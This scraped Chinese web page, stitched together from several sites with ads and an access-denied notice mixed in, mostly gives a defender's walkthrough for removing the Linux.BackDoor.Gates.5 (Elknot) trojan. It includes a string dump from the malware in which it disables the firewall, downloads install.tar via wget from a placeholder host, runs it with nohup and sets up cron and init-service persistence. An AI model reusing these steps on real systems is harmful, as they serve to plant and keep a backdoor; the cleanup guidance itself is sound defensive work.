backdoor teen mom.gates.5 如何攻击的

来源:蜘蛛抓取(WebSpider) 时间:2015-02-27 01:04 标签: backdoor.trojan
> backdoor
热门文章热门标签
12月15日 |
12月15日 |
12月15日 |
12月15日 |
12月15日 |
12月15日 |
12月15日 |
12月15日 |Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理
编辑:www.fx114.net
本篇文章主要介绍了"Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理",主要涉及到Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理方面的内容,对于Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理感兴趣的同学可以参考一下。
Linux服务器被黑, 向外疯狂发包,造成网络瘫痪,
可用clamAV扫描, 显示是Linux Unix.Trojan.Elknot木马病毒(Linux.BackDoor.Gates.5),
这个木马,伪装和自我保能力很强,要想彻底清除必须要认识到该木马病毒的特性
1、关闭防火墙
2、伪装系统服务
3、伪装系统命令
4、定时自动启动
认识到这些后采取相应的在动作
1、关闭防活墙
该木马病毒会自动关闭防火墙iptables,可把iptables更改服务名称
mv /etc/init.d/iptables iptables2
2、伪装系统服务&
伪装的系统服务有
DbSecuritySpt
可先把这些服务停止,
service&taskgrm- stop
chkconfig --del &taskgrm-
rm /etc/init.d/taskgrm-
3、伪装系统命令
&&&伪装的系统命令有:
要把这些文件删除掉,从别的系统里再copy过来
4、定时自动启动
&&& 木马病毒是修改了/etc/crontab文件
木最后还需要清除木马病毒文件及进程
/bin/install.rar
/root/xl123
/bin/socket
/bin/install.tar
/bin/.sshd
我是通过对install.rar的分析来弄清楚这个木马病毒的,
解压install.rar,里面的文件都是病毒文件,
用vim 打开mysql515从其中的一些片断可弄清该病毒是如何工作的
&^@service iptables stop^
&@/bin/install.tar^@wget -c -P /bin http://%s/install.tar^@^@^
&@tar -xf /bin/install.tar -C /bin/^@%s/xl123^@/root/xl123^@chmod 0777
&/bin/mysql515^@chmod 0777 /bin/socket^@chmod 0777 /bin/cnet2^@chmod 0755
&/root/xl123^@rm -rf /root/xl123h /usr/bin/%s^@nohup /bin/socket & /dev/null 2&&1
& &^@/bin/rc.local^@%s/rc.local^@/etc/rc.local^@%s/crontab^@/etc/crontab^@%s/%s^@a^@cd %s
chmod 777 %s/%s
./%s^@chmod 777 %s/%s^@a+^@*/55 * * * * root %s/%s
^@/etc/init.d/taskgrm-
^@/bin/taskgrm-
^@^@^@chmod 777 /etc/init.d/taskgrm-
^@^@ln -s /etc/init.d/taskgrm- /etc/rc.d/rc5.d/taskgrm-
^@chmod 777 /etc/rc.d/rc5.d/taskgrm-
^@chkconfig --add taskgrm-^@mysql515^@/bin^@cngamemafix.sh^@r^@the file1 can not open %s
^@w^@^@^@^@the new file can not open %s
其中有关闭防火墙壁, 下载病毒程序install.tar,添加自启动服务,定进运行等,
通过这些线索可帮助我们去清理该病毒
一、不得利用本站危害国家安全、泄露国家秘密,不得侵犯国家社会集体的和公民的合法权益,不得利用本站制作、复制和传播不法有害信息!
二、互相尊重,对自己的言论和行为负责。
本文标题:
本页链接:博客访问: 1798868
博文数量: 1425
注册时间:
发布时间: 09:09:50
一、现象Linux服务器被黑, 向外疯狂发包,造成网络瘫痪。nload显示100Mbit/s。(nload统计流量软件)二、木马扫描1、ClamAV介绍ClamAV是一个在命令行下查毒软件,因为它不将杀毒作为主要功能,默认只能查出您计算机内的病毒,但是无法清除,至多删除文件。ClamAV可以工作很多的平台上,但是有少数无法支.........
阅读(125) | 评论(0) | 转发(0)
发布时间: 09:04:03
首先用 lsattr &查看该文件有什么属性,然后用chattr    1.作用    修改ext2和ext3文件系统属性(attribute),使用权限超级用户。    2.格式    chattr [-RV] [-+=AacDdijsSu] [-v version] 文件或目录    3.主要参数    -R:递归处理所有的文件及子目录。    -V:详细显.........
阅读(44) | 评论(0) | 转发(0)
给主人留下些什么吧!~~
请登录后留言。拒绝访问 | www.codesec.net | 百度云加速
请打开cookies.
此网站 (www.codesec.net) 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(414fa609d5d24364-ua98).
重新安装浏览器,或使用别的浏览器&nbsp>&nbsp
&nbsp>&nbsp
&nbsp>&nbsp
记一次linux被Linux.BackDoor.Gates.5 木马攻击
摘要:通过访问日志分析是通过struts2的漏洞,进入服务器,种植木马的具体看以下参考连接,后续补上详细过程参考连接http://blog.csdn.net/xishuang_gongzi/article/details/http://zhuanlan.51cto.com/art/751.htm
通过访问日志分析 是 通过struts2的漏洞,进入服务器,种植木马的
具体看以下参考连接,后续补上详细过程
http://blog.csdn.net/xishuang_gongzi/article/details/
http://zhuanlan.51cto.com/art/751.htm
以上是的内容,更多
的内容,请您使用右上方搜索功能获取相关信息。
若你要投稿、删除文章请联系邮箱:zixun-group@service.aliyun.com,工作人员会在五个工作日内给你回复。
云服务器 ECS
可弹性伸缩、安全稳定、简单易用
&40.8元/月起
预测未发生的攻击
&24元/月起
为您提供0门槛上云实践机会
你可能还喜欢
你可能感兴趣
阿里云教程中心为您免费提供
记一次linux被Linux.BackDoor.Gates.5 木马攻击相关信息,包括
的信息,所有记一次linux被Linux.BackDoor.Gates.5 木马攻击相关内容均不代表阿里云的意见!投稿删除文章请联系邮箱:zixun-group@service.aliyun.com,工作人员会在五个工作日内答复
售前咨询热线
支持与服务
资源和社区
关注阿里云
International

我要回帖

更多关于 backdoor.trojan 的文章

 

随机推荐